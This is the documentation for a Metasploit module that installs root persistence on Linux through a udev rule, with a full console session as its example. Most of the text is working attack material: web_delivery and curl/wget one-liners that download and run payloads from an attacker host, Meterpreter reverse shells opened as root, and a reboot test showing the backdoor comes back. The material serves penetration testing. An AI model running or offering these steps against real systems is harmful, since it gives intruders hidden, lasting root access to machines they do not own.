documentation/modules/exploit/linux/persistence/udev.md
This is a post module that performs a persistence installation on a Linux system using udev.
The persistence execution with be triggered with root privileges everytime a network interface other than l0 comes up.
Execution is triggered through at command, so it must be installed on the target.
use exploit/linux/persistence/udevset session -1exploitName of the payload file to write. Defaults to random.
Path to udev rules folder. Defaults to /lib/udev/rules.d/
Rule name for udev. Defaults to random
Initial shell
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 2.2.2.2
lhost => 2.2.2.2
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 2.2.2.2:4446
[*] Using URL: http://2.2.2.2:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Qjdo0XSK --no-check-certificate http://2.2.2.2:8082/l; chmod +x Qjdo0XSK; ./Qjdo0XSK& disown
msf exploit(multi/script/web_delivery) >
[*] 1.1.1.1 web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4446 -> 1.1.1.1:43842) at 2025-12-20 16:24:02 -0500
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : 1.1.1.1
OS : Ubuntu 24.04 (Linux 6.8.0-31-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > background
[*] Backgrounding session 1...
Persistence install
msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/udev
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/persistence/udev) > set session 1
session => 1
msf exploit(linux/persistence/udev) > set WritableDir /opt/
WritableDir => /opt/
msf exploit(linux/persistence/udev) > exploit
[*] Command to run on remote host: curl -so ./eULGakHgwKeL http://2.2.2.2:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./eULGakHgwKeL;./eULGakHgwKeL&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Fetch handler listening on 2.2.2.2:8080
[*] HTTP server started
[*] Adding resource /t70WmtC4mNeBieRpZqn09Q
[*] Started reverse TCP handler on 2.2.2.2:4444
msf exploit(linux/persistence/udev) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. likely exploitable
[*] Writing '/opt//Z7CpOCzhzq' (271 bytes) ...
[+] /opt//Z7CpOCzhzq written
[+] /lib/udev/rules.d//41-EInB5urA.rules written
[*] Triggering udev rule
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/1.1.1.1_20251220.5601/1.1.1.1_20251220.5601.rc
[*] Client 1.1.1.1 requested /t70WmtC4mNeBieRpZqn09Q
[*] Sending payload to 1.1.1.1 (curl/8.5.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:38100) at 2025-12-20 16:56:03 -0500
Trigger a reboot to test the persistence
msf exploit(linux/persistence/udev) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 1394 created.
Channel 8 created.
reboot
[*] 1.1.1.1 - Meterpreter session 1 closed. Reason: Died
Terminate channel 8? [y/N] y
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
msf exploit(linux/persistence/udev) >
[*] Client 1.1.1.1 requested /t70WmtC4mNeBieRpZqn09Q
[*] Sending payload to 1.1.1.1 (curl/8.5.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 3 opened (2.2.2.2:4444 -> 1.1.1.1:35550) at 2025-12-20 16:56:38 -0500
[*] 1.1.1.1 - Meterpreter session 2 closed. Reason: Died
msf exploit(linux/persistence/udev) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > getuid
Server username: root
meterpreter >